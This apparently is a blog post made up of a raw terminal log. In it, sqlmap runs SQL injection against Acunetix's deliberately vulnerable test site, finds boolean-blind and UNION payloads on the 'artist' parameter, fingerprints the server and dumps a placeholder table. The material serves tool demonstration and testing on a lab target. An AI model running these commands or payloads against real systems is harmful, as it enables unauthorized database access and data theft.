[~/Work/sqlmap/trunk/sqlmap] ./sqlmap.py -u "http://testphp.vulnweb.com/art
ists.php?artist=1" --dump -D acuart -T categ --fresh-queries --replicate --batch
sqlmap/1.0-dev (r4005) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mu
tual consent can be considered as an illegal activity. it is the final user's re
sponsibility to obey all applicable local, state and federal laws. authors assum
e no liability and are not responsible for any misuse or damage caused by this p
rogram.
[*] starting at: 14:52:32
[14:52:32] [INFO] using '/home/stamparm/Work/sqlmap/trunk/sqlmap/output/testphp.
vulnweb.com/session' as session file
[14:52:32] [INFO] resuming injection data from session file
[14:52:32] [INFO] resuming back-end DBMS 'mysql 5' from session file
[14:52:32] [INFO] testing connection to the target url
[14:52:32] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: artist
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: artist=1 AND 472=472
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: artist=-9746 UNION ALL SELECT NULL, CONCAT(CHAR(58,115,118,111,58),
CHAR(108,70,118,105,102,97,88,65,72,101),CHAR(58,98,108,102,58)), NULL#
---
[14:52:32] [INFO] manual usage of GET payloads requires url encoding
[14:52:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake
)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[14:52:32] [INFO] fetching columns for table 'categ' on database 'acuart'
[14:52:32] [INFO] the SQL query used returns 3 entries
[14:52:32] [INFO] retrieved: "cdesc","tinytext"
[14:52:33] [INFO] retrieved: "cname","varchar(50)"
[14:52:33] [INFO] retrieved: "cat_id","int(5)"
[14:52:33] [INFO] fetching entries for table 'categ' on database 'acuart'
[14:52:33] [INFO] the SQL query used returns 4 entries
[14:52:33] [INFO] retrieved: "Lorem ipsum dolor sit amet, consectetuer adipis...
[14:52:33] [INFO] retrieved: "Lorem ipsum dolor sit amet, consectetuer adipis...
[14:52:33] [INFO] retrieved: "Lorem ipsum dolor sit amet, consectetuer adipis...
Database: acuart .
Table: categ
[4 entries]
+--------+----------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
------------------------------+-----------+
| cat_id | cdesc | cname |
+--------+----------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
------------------------------+-----------+
| 2 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec moles
tie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentu
m facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras qu
is libero.\n Cras venenati | Paintings |
| 1 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec moles
tie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentu
m facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras qu
is libero.\n Cras venenati | Posters |
| 4 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec moles
tie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentu
m facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras qu
is libero.\n Cras venenati | Graffity |
| 3 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec moles
tie.\n Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentu
m facilisis\n nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras qu
is libero.\n Cras venenati | Stickers |
+--------+----------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
------------------------------+-----------+
[14:52:33] [INFO] Table 'acuart.categ' dumped to sqlite3 file '/home/stamparm/Wo
rk/sqlmap/trunk/sqlmap/output/testphp.vulnweb.com/dump/acuart.sqlite3'
[14:52:33] [INFO] Fetched data logged to text files under '/home/stamparm/Work/s
qlmap/trunk/sqlmap/output/testphp.vulnweb.com'
[*] shutting down at: 14:52:33
[~/Work/sqlmap/trunk/sqlmap] sqlite3 /home/stamparm/Work/sqlmap/trunk/sqlmap/out
put/testphp.vulnweb.com/dump/acuart.sqlite3
SQLite version 3.7.4
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> SELECT * FROM categ;
2|Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum faci
lisis
nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
Cras venenati|Paintings
1|Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum faci
lisis
nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
Cras venenati|Posters
4|Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum faci
lisis
nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
Cras venenati|Graffity
3|Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum faci
lisis
nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero.
Cras venenati|Stickers
sqlite>
Wednesday, June 1, 2011
sqlmap vs Acunetix PHP testing web server (part II)
Subscribe to:
Post Comments (Atom)
1 comment:
Post a Comment